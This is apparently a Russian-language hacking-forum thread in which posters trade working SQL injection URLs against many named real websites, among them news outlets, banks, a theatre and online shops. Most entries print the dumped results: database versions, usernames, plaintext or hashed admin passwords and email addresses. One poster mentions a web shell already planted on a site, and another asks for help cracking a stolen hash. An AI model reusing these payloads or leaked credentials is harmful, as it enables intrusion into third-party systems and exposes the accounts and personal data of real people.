http://www.slamdunk.ro/stire.php?id=-400+union+select+1,2,3,4,5,6,7,8,9/* http://www.ccimm.ro/search/show.php?id=-131'+union+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,0,1,2,3,4,5+from+user/*
http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Code: http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/* Version: 4.1.18 User/Pass: root/40cdfeb7631887f0
K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ При инъекции в скрипте persons.php можно узнать немного больше Code: http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user(),5,6,7,8,database(),10-- VERSION(): 4.0.24_Debian-10sarge2-log DATABASE(): tuzbycom USER(): tuzbycom@localhost Так же подвержен скуль-инъекции скрипт Code: http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--
Code: http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/* Version: 5.0.33 uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4 P.S юзаем (limit+x,x) для вывода юзеров=)
Code: http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/* Version: 4.0.27 name/pass: Administrator/another_enter P.S юзаем (limit+x,x) для вывода юзеров=)
Davinciinstitute.com - PR 6 как разшифровать? попробвал hex(ascii)=md5 Bouldertheater.com - PR 6 Umpcportal.com - PR 6 Linspire.com - PR 7 Allianceforbiz.com - PR 6 Koleso.topof.ru - PR 4 Cccs.com - PR 5 увы.. но для вывода нужно зарегатся..(
Да, чёта меня на метео потянуло... gismeteo.ru Google PR 6 / 10 Яндекс тИЦ 19000 Database Version: 4.1.1-alpha-standard Database name: search User name: root@localhost
Viperson.ru - PR 4 Cyberthing.net - PR 3 Dimi4 load_file никто не отменял..) и это. но сдесь почемуто на рута пасса нету
Ну что же друзья...а вот и я http://www.gathsports.com/productsingle.php?id=1%27+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* Database Version: 5.0.22 Database name: web56_db1 User name: web56_u1@localhost в БД единственная интересная на мой взгляд таблица login с колонками username и password там всего 2 записи ric:letmein sue:letmein админку не искал... всем спасибо Ну а теперь предлагаю вашему вниманию сайт с ПР6, www.jurnalul.ro очень известный и популярный в Румынии журнал, на самом сайте я ничего интересного не нашел...но через суб домен... http://copiidisparuti.jurnalul.ro я обнаружил скулю и соответственно и база у них одна.Админ и редакция были мной уведомлены еще месяц назад, так как они ничего не придпренимают..выложил так сказать в паблик http://copiidisparuti.jurnalul.ro/detalii.php?s=1&id=149+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9+limit+1,1/* Database Version: 5.0.24a Database name: copiidisp User name: jurnalul@localhost В БД 2 базы но нам интересна база jurnalul_site где находится информация нужная нам..то есть админы admins admin_username, admin_password admin:qZpD7%uJqdJ. flori:nokia claudiugamulescu:claudiu diana:karakum aleks:huinea последний в записях админа скорее всего молдованин или руский который работает в редакции, так как пароль скажем так с русской спецификой. Всем спасибо. Пойдем дальше... http://www.radiogaga.ro/listgalerii.php?idgalerie=1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(version(),database(),user()),0x71),0x71),4,5,6,7,8,9/* Database Version: 4.1.13a RDS Hosting Databases Database name: radiogaga User name: radiogaga@localhost кроме phpbb_users не нашел ничего user_password, username 6be414417e0001f12039083621f436cc:avitus----> Alamo97 41955c3830838c240729b92550c12dd9:Francisc Pataki f07fa1d519bf547c76ba56b732c2cd27:Kraus Kinga 09909326d2ba3e970de66c159b05bdf6:Misi 81ef1753db31e4c85dbc18b9c751d336:OLi! 905492bc9379a5efde0923283fc82d00:gerbera51 bc9850b32b863fd80cdf7ef63c183759:gravamen_1686 b1932d548fa7208117e4d332c378c532:castigo1307 http://www.tailormadetours.com.au/emailtofriend.php?ID=-1+UNION+SELECT+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/* Database Version: 5.0.46 Database name: ttours User name: [email protected] вывод в поле Your Message В БД 3 базы : test test_cms_database ttours только в первой есть таблица users ..но в ней только userid username emailaddress 3:shayne:[email protected] 4:mike:[email protected] у кого есть желание поковырятся..милости просим.Спасибо всем.
http://www.bankrollmob.com/forum.asp?mode=thread&id=-32278%20union%20select%20pwd,2%20from%20admin Password: 75ea14129638ac5c2bd34c0a615dfe7f Please crack for me password. Help me
PR 4 version(): 5.0.45-community user(): blackgos_test@localhost database(): blackgos_bgppromos тут есть кое что интересное=)
Я открыл его _http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+17,1/* Таблица admin_user в титле Сам ковыряй, если надо _http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(user_name,0x3a,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin_user/* j1prophet:BEAtrice
www.photo.buyyourstockphotos.com version(): 5.0.51a-3ubuntu5.1 user(): buystock@localhost database(): buystock file_priv к сожалению нет.. так как версия пятая, то есть база information_schema.. из нее берем названия таблиц: есть табличка users.. смотрим какие в ней колонки и делаем вывод из таблицы все очень просто=)
== Анализ Сайта kreit.ru == Яндекс: тИЦ - 110, Страниц - 313 Google: PR - 2 ЯК: Есть; ===================================== [email protected]::5.0.41-log::kreit merlin_sw:2e782c85379a326e:[email protected]: 135 записей, типа хэша Mysql5
Code: http://www.dpmhi.com/news.php?id=-1+union+select+all+1,2,concat_ws(0x3a,version(),user(),database()),4,5-- Code: http://www.worldwidehealthcenter.net/category.php?prod=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,11,darkc0de,13,14,15,16,17,18 Code: http://www.jleen.com/page.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3-- Code: http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9-- Code: http://firstfreedombank.com/PRstory.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5-- Code: http://www.atbskimmers.com/product.php?id=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26-- Code: http://www.pokerdvd.net/product.php?id=-1+union+select+all+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15-- Code: http://www.asynt.com/product_ranges_view.php?ID=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9-- Code: http://www.mofsupply.com/productDetail.php?id=-1+union+select+all+1,2,3,darkc0de,5,6,7,8,9,10,11,12,13,14,15,16,17 Code: http://www.texasalliance.org/houstonwildcatters.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13-- Code: http://www.icd-usa.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11-- http://www.cnet.org.uk/news1.php?ID=-60+UNION+ALL+SELECT+1,@@version,3,4-- http://www.corporatedevelopmint.com/news1.php?ID=-152+UNION+ALL+SELECT+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14-- http://effluxtechnologies.com/news1.php?ID=-8+UNION+ALL+SELECT+1,@@version,3,4,5-- http://www.michaelpollan.com/article.php?id=-87+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10-- http://www.virtuosimedia.com/resource.php?id=0&cat=-1+UNION+ALL+SELECT+1,@@version,3,4-- http://www.guerrillanews.com/articles/article.php?id=-717+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18,19,20,21,22,23-- http://www.etleboro.com/read.php?id=-396+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9-- http://www.syroil.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version-- http://www.lavocedellevoci.it/news1.php?id=-80+UNION+ALL+SELECT+1,2,3,4,@@version,6-- http://www.lavocedellevoci.it/grandifirme1.php?id=-20+UNION+ALL+SELECT+1,2,@@version,4,5-- http://www.allfungames.com/games.php?id=-8+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13-- http://www.warnickart.com/posters/art.php?id=-78+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13-- http://www.neltnercreative.com/advertising/art.php?id=-57+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- http://www.purdes.com/blog/art.php?id=-164+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8--
